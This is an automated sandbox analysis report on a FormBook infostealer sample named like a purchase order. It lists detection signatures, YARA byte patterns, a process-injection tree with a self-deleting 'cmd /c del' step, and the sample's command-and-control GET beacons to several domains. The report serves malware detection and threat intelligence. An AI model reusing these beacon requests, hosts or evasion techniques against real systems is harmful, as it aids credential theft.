Loading ...

Play interactive tourEdit tour

Analysis Report PO#47974GH397.exe

Overview

General Information

Sample Name:PO#47974GH397.exe
Analysis ID:299603
MD5:2eb304b953f7882a5450c4fa5793063c
SHA1:869638f8e191f672a5586aadf57817d01dfb8c9d
SHA256:e4badaf86c0f22c6b31c97f661ba5af3f757697e7493c2e750a813173dec2273
Tags:exeFormbook

Most interesting Screenshot:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
System process connects to network (likely due to code injection or exploit)
Yara detected FormBook
Initial sample is a PE file and has a suspicious name
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Tries to detect virtualization through RDTSC time measurements
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a DirectInput object (often for capturing keystrokes)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Tries to load missing DLLs
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Startup

  • System is w10x64
  • PO#47974GH397.exe (PID: 6804 cmdline: 'C:\Users\user\Desktop\PO#47974GH397.exe' MD5: 2EB304B953F7882A5450C4FA5793063C)
    • conhost.exe (PID: 4780 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • PO#47974GH397.exe (PID: 6220 cmdline: C:\Users\user\Desktop\PO#47974GH397.exe MD5: 2EB304B953F7882A5450C4FA5793063C)
      • explorer.exe (PID: 3424 cmdline: MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • msiexec.exe (PID: 7084 cmdline: C:\Windows\SysWOW64\msiexec.exe MD5: 12C17B5A5C2A7B97342C362CA467E9A2)
          • cmd.exe (PID: 6064 cmdline: /c del 'C:\Users\user\Desktop\PO#47974GH397.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 1020 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000000.00000002.738537866.0000000000680000.00000004.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
    00000000.00000002.738537866.0000000000680000.00000004.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
    • 0x83c8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x8762:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x14075:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x13b61:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x14177:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x142ef:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0x916a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x12ddc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0x9ee2:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x19157:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1a1ca:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    00000000.00000002.738537866.0000000000680000.00000004.00000001.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
    • 0x16079:$sqlite3step: 68 34 1C 7B E1
    • 0x1618c:$sqlite3step: 68 34 1C 7B E1
    • 0x160a8:$sqlite3text: 68 38 2A 90 C5
    • 0x161cd:$sqlite3text: 68 38 2A 90 C5
    • 0x160bb:$sqlite3blob: 68 53 D8 7F 8C
    • 0x161e3:$sqlite3blob: 68 53 D8 7F 8C
    0000000A.00000002.777960728.0000000001180000.00000040.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
      0000000A.00000002.777960728.0000000001180000.00000040.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
      • 0x83c8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x8762:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x14075:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x13b61:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x14177:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x142ef:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0x916a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x12ddc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0x9ee2:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0x19157:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x1a1ca:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
      Click to see the 16 entries

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      0.2.PO#47974GH397.exe.680000.1.raw.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
        0.2.PO#47974GH397.exe.680000.1.raw.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
        • 0x83c8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x8762:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x14075:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
        • 0x13b61:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
        • 0x14177:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
        • 0x142ef:$sequence_4: 5D C3 8D 50 7C 80 FA 07
        • 0x916a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
        • 0x12ddc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
        • 0x9ee2:$sequence_7: 66 89 0C 02 5B 8B E5 5D
        • 0x19157:$sequence_8: 3C 54 74 04 3C 74 75 F4
        • 0x1a1ca:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
        0.2.PO#47974GH397.exe.680000.1.raw.unpackFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
        • 0x16079:$sqlite3step: 68 34 1C 7B E1
        • 0x1618c:$sqlite3step: 68 34 1C 7B E1
        • 0x160a8:$sqlite3text: 68 38 2A 90 C5
        • 0x161cd:$sqlite3text: 68 38 2A 90 C5
        • 0x160bb:$sqlite3blob: 68 53 D8 7F 8C
        • 0x161e3:$sqlite3blob: 68 53 D8 7F 8C
        0.2.PO#47974GH397.exe.680000.1.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
          0.2.PO#47974GH397.exe.680000.1.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
          • 0x75c8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x7962:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x13275:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
          • 0x12d61:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
          • 0x13377:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
          • 0x134ef:$sequence_4: 5D C3 8D 50 7C 80 FA 07
          • 0x836a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
          • 0x11fdc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
          • 0x90e2:$sequence_7: 66 89 0C 02 5B 8B E5 5D
          • 0x18357:$sequence_8: 3C 54 74 04 3C 74 75 F4
          • 0x193ca:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
          Click to see the 7 entries

          Sigma Overview

          No Sigma rule has matched

          Signature Overview

          Click to jump to signature section

          Show All Signature Results

          AV Detection:

          barindex
          Multi AV Scanner detection for submitted fileShow sources
          Source: PO#47974GH397.exeReversingLabs: Detection: 14%
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000000.00000002.738537866.0000000000680000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000002.777960728.0000000001180000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000E.00000002.926204055.0000000000B40000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000002.774077468.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000E.00000002.926141848.0000000000B10000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000E.00000002.925274788.0000000000580000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000002.777541702.0000000000F20000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0.2.PO#47974GH397.exe.680000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.PO#47974GH397.exe.680000.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 10.2.PO#47974GH397.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 10.2.PO#47974GH397.exe.400000.0.unpack, type: UNPACKEDPE
          Machine Learning detection for sampleShow sources
          Source: PO#47974GH397.exeJoe Sandbox ML: detected
          Source: 0.2.PO#47974GH397.exe.680000.1.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 10.2.PO#47974GH397.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: C:\Users\user\Desktop\PO#47974GH397.exeCode function: 0_2_00872595 FindFirstFileExW,0_2_00872595
          Source: C:\Users\user\Desktop\PO#47974GH397.exeCode function: 10_2_00872595 FindFirstFileExW,10_2_00872595
          Source: C:\Users\user\Desktop\PO#47974GH397.exeCode function: 4x nop then pop edi10_2_0041502C
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then pop edi14_2_0059502C

          Networking:

          barindex
          Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
          Source: TrafficSnort IDS: 1201 ATTACK-RESPONSES 403 Forbidden 34.102.136.180:80 -> 192.168.2.4:49756
          Source: TrafficSnort IDS: 1201 ATTACK-RESPONSES 403 Forbidden 34.102.136.180:80 -> 192.168.2.4:49763
          Source: TrafficSnort IDS: 1201 ATTACK-RESPONSES 403 Forbidden 34.102.136.180:80 -> 192.168.2.4:49765
          Source: global trafficHTTP traffic detected: GET /d8h/?LL0=MhVrkd+BH7EfIC7UMZ6NNsIyivh3rs3YLYA2B681+Io0UxqoN/0Kf6ttoARFajJ8w2VH&Uxl0=AjGdKDV HTTP/1.1Host: www.steeltownlabs.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /d8h/?LL0=zqmrbz2GSNEF40GbFWf5jI58xAusWeMf/pW86Dj8ttUv5A8DnqXHvlA3jvurE0I2Q1gR&Uxl0=AjGdKDV HTTP/1.1Host: www.igensheets.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /d8h/?LL0=fzokW3/OIykmhopALxfTmh/FjffJxl1EnyCunmGL8YrSGft99pw64/62N1TdrtahIrhj&Uxl0=AjGdKDV HTTP/1.1Host: www.interaction-logistics.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /d8h/?LL0=BeM5oIWdPTJOiFnjQO+IqBO/neltk2vktJQt+Ph2cW5xLg9JehTbyWJpLiw3GNRJely5&Uxl0=AjGdKDV HTTP/1.1Host: www.jerseycoastcollectibles.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /d8h/?LL0=ObwgsRM7dcJAlA1y+ycgiUqsnNVZw59s173MjYldMxLq8hK3Qjedo/wCEGL+rhqNG4rF&Uxl0=AjGdKDV HTTP/1.1Host: www.hiddenhillsgems.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /d8h/?LL0=0JNaWD+vE3WAKhUwjj+TKeKuqytbEj/rGf7L+MsFdzHuvdvProgHb0a/NNp8I7FyRZal&Uxl0=AjGdKDV HTTP/1.1Host: www.bottrader.digitalConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /d8h/?LL0=Hq+6mioOa5zS+RTAheDyrTt2wHKRirpuZ3pzAQqkO6QOSy1kHwQMq1eFi5u11RtaPGvs&Uxl0=AjGdKDV HTTP/1.1Host: www.sparkasse-suedpfalz.netConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /d8h/?LL0=8WkUkTlv9TEdGDe9rqHtpRXMtgPzvw8OHTjX5OuITs46esx4TOeHbG9/qOJ2WNaP40DD&Uxl0=AjGdKDV HTTP/1.1Host: www.keepamericansgreatagain.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: Joe Sandbox ViewIP Address: 34.102.136.180 34.102.136.180
          Source: Joe Sandbox ViewASN Name: GOOGLEUS GOOGLEUS
          Source: Joe Sandbox ViewASN Name: ASTRALUSNL ASTRALUSNL
          Source: Joe Sandbox ViewASN Name: BCPL-SGBGPNETGlobalASNSG BCPL-SGBGPNETGlobalASNSG
          Source: Joe Sandbox ViewASN Name: UNIFIEDLAYER-AS-1US UNIFIEDLAYER-AS-1US
          Source: global trafficHTTP traffic detected: GET /d8h/?LL0=MhVrkd+BH7EfIC7UMZ6NNsIyivh3rs3YLYA2B681+Io0UxqoN/0Kf6ttoARFajJ8w2VH&Uxl0=AjGdKDV HTTP/1.1Host: www.steeltownlabs.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /d8h/?LL0=zqmrbz2GSNEF40GbFWf5jI58xAusWeMf/pW86Dj8ttUv5A8DnqXHvlA3jvurE0I2Q1gR&Uxl0=AjGdKDV HTTP/1.1Host: www.igensheets.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /d8h/?LL0=fzokW3/OIykmhopALxfTmh/FjffJxl1EnyCunmGL8YrSGft99pw64/62N1TdrtahIrhj&Uxl0=AjGdKDV HTTP/1.1Host: www.interaction-logistics.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /d8h/?LL0=BeM5oIWdPTJOiFnjQO+IqBO/neltk2vktJQt+Ph2cW5xLg9JehTbyWJpLiw3GNRJely5&Uxl0=AjGdKDV HTTP/1.1Host: www.jerseycoastcollectibles.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /d8h/?LL0=ObwgsRM7dcJAlA1y+ycgiUqsnNVZw59s173MjYldMxLq8hK3Qjedo/wCEGL+rhqNG4rF&Uxl0=AjGdKDV HTTP/1.1Host: www.hiddenhillsgems.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /d8h/?LL0=0JNaWD+vE3WAKhUwjj+TKeKuqytbEj/rGf7L+MsFdzHuvdvProgHb0a/NNp8I7FyRZal&Uxl0=AjGdKDV HTTP/1.1Host: www.bottrader.digitalConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /d8h/?LL0=Hq+6mioOa5zS+RTAheDyrTt2wHKRirpuZ3pzAQqkO6QOSy1kHwQMq1eFi5u11RtaPGvs&Uxl0=AjGdKDV HTTP/1.1Host: www.sparkasse-suedpfalz.netConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /d8h/?LL0=8WkUkTlv9TEdGDe9rqHtpRXMtgPzvw8OHTjX5OuITs46esx4TOeHbG9/qOJ2WNaP40DD&Uxl0=AjGdKDV HTTP/1.1Host: www.keepamericansgreatagain.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: unknownDNS traffic detected: queries for: www.steeltownlabs.com
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 17 Oct 2020 06:57:15 GMTServer: Apache/2Content-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
          Source: explorer.exe, 0000000B.00000000.757504945.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://fontfabrik.com
          Source: explorer.exe, 0000000B.00000000.741118834.0000000002B50000.00000002.00000001.sdmpString found in binary or memory: http://www.%s.comPA
          Source: explorer.exe, 0000000B.00000000.757504945.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
          Source: explorer.exe, 0000000B.00000000.757504945.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.carterandcone.coml
          Source: explorer.exe, 0000000B.00000000.757504945.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com
          Source: explorer.exe, 0000000B.00000000.757504945.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers
          Source: explorer.exe, 0000000B.00000000.757504945.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
          Source: explorer.exe, 0000000B.00000000.757504945.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
          Source: explorer.exe, 0000000B.00000000.757504945.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
          Source: explorer.exe, 0000000B.00000000.757504945.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
          Source: explorer.exe, 0000000B.00000000.757504945.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
          Source: explorer.exe, 0000000B.00000000.757504945.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
          Source: explorer.exe, 0000000B.00000000.757504945.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.fonts.com
          Source: explorer.exe, 0000000B.00000000.757504945.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn
          Source: explorer.exe, 0000000B.00000000.757504945.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
          Source: explorer.exe, 0000000B.00000000.757504945.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
          Source: explorer.exe, 0000000B.00000000.757504945.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
          Source: explorer.exe, 0000000B.00000000.757504945.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
          Source: explorer.exe, 0000000B.00000000.757504945.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.goodfont.co.kr
          Source: explorer.exe, 0000000B.00000000.757504945.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
          Source: explorer.exe, 0000000B.00000000.757504945.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.sajatypeworks.com
          Source: explorer.exe, 0000000B.00000000.757504945.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.sakkal.com
          Source: explorer.exe, 0000000B.00000000.757504945.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.sandoll.co.kr
          Source: explorer.exe, 0000000B.00000000.757504945.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.tiro.com
          Source: explorer.exe, 0000000B.00000000.757504945.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.typography.netD
          Source: explorer.exe, 0000000B.00000000.757504945.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.urwpp.deDPlease
          Source: explorer.exe, 0000000B.00000000.757504945.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
          Source: msiexec.exe, 0000000E.00000002.928724993.0000000004F7D000.00000004.00000001.sdmpString found in binary or memory: https://www.sparkasse-suew.de/d8h/?LL0=Hq
          Source: PO#47974GH397.exe, 00000000.00000002.738610318.0000000000A8A000.00000004.00000020.sdmpBinary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

          E-Banking Fraud:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000000.00000002.738537866.0000000000680000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000002.777960728.0000000001180000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000E.00000002.926204055.0000000000B40000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000002.774077468.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000E.00000002.926141848.0000000000B10000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000E.00000002.925274788.0000000000580000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000002.777541702.0000000000F20000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0.2.PO#47974GH397.exe.680000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.PO#47974GH397.exe.680000.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 10.2.PO#47974GH397.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 10.2.PO#47974GH397.exe.400000.0.unpack, type: UNPACKEDPE

          System Summary:

          barindex
          Malicious sample detected (through community Yara rule)Show sources
          Source: 00000000.00000002.738537866.0000000000680000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000000.00000002.738537866.0000000000680000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000A.00000002.777960728.0000000001180000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000A.00000002.777960728.0000000001180000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000E.00000002.926204055.0000000000B40000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000E.00000002.926204055.0000000000B40000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000A.00000002.774077468.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000A.00000002.774077468.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000E.00000002.926141848.0000000000B10000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000E.00000002.926141848.0000000000B10000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000E.00000002.925274788.0000000000580000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000E.00000002.925274788.0000000000580000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000A.00000002.777541702.0000000000F20000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000A.00000002.777541702.0000000000F20000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0.2.PO#47974GH397.exe.680000.1.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0.2.PO#47974GH397.exe.680000.1.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0.2.PO#47974GH397.exe.680000.1.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0.2.PO#47974GH397.exe.680000.1.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 10.2.PO#47974GH397.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 10.2.PO#47974GH397.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 10.2.PO#47974GH397.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 10.2.PO#47974GH397.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Initial sample is a PE file and has a suspicious nameShow sources
          Source: initial sampleStatic PE information: Filename: PO#47974GH397.exe
          Source: C:\Users\user\Desktop\PO#47974GH397.exeCode function: 10_2_00417B90 NtCreateFile,10_2_00417B90
          Source: C:\Users\user\Desktop\PO#47974GH397.exeCode function: 10_2_00417C40 NtReadFile,10_2_00417C40
          Source: C:\Users\user\Desktop\PO#47974GH397.exeCode function: 10_2_00417CC0 NtClose,10_2_00417CC0
          Source: C:\Users\user\Desktop\PO#47974GH397.exeCode function: 10_2_00417D70 NtAllocateVirtualMemory,10_2_00417D70
          Source: C:\Users\user\Desktop\PO#47974GH397.exeCode function: 10_2_00417B8B NtCreateFile,10_2_00417B8B
          Source: C:\Users\user\Desktop\PO#47974GH397.exeCode function: 10_2_00417CBA NtReadFile,10_2_00417CBA
          Source: C:\Users\user\Desktop\PO#47974GH397.exeCode function: 10_2_00417D6C NtAllocateVirtualMemory,10_2_00417D6C
          Source: C:\Users\user\Desktop\PO#47974GH397.exeCode function: 10_2_01289910 NtAdjustPrivilegesToken,LdrInitializeThunk,10_2_01289910
          Source: C:\Users\user\Desktop\PO#47974GH397.exeCode function: 10_2_012899A0 NtCreateSection,LdrInitializeThunk,10_2_012899A0
          Source: C:\Users\user\Desktop\PO#47974GH397.exeCode function: 10_2_01289860 NtQuerySystemInformation,LdrInitializeThunk,10_2_01289860
          Source: C:\Users\user\Desktop\PO#47974GH397.exeCode function: 10_2_01289840 NtDelayExecution,LdrInitializeThunk,10_2_01289840
